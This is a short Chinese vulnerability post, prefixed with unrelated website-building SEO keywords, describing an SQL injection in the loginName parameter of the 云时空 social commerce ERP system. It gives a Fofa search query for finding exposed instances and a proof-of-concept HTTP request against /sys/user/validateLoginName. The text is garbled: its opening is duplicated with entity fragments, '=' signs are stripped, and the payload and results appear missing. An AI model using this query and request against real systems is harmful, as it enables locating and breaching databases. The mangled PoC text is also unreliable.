重庆网站维护,页面设计参评,运动器材网站建设,网站建设 前景 html5漏洞描述#xff1a;
云时空社会化商业ERP系统loginName存在SQL注入漏洞#xff0c;攻击者可以通过此漏洞获取数据库敏感信息。
搜索语法:
Fofa-Query: app云时空社会化商业ERP系统
漏洞详情#xff1a;
1.云时空社会化商业ERP系统。 2.漏洞POC#xff1a…漏洞描述
云时空社会化商业ERP系统loginName存在SQL注入漏洞攻击者可以通过此漏洞获取数据库敏感信息。
搜索语法:
Fofa-Query: app云时空社会化商业ERP系统
漏洞详情
1.云时空社会化商业ERP系统。 2.漏洞POC
GET /sys/user/validateLoginName?loginNameadmin HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: close
3.漏洞复现结果。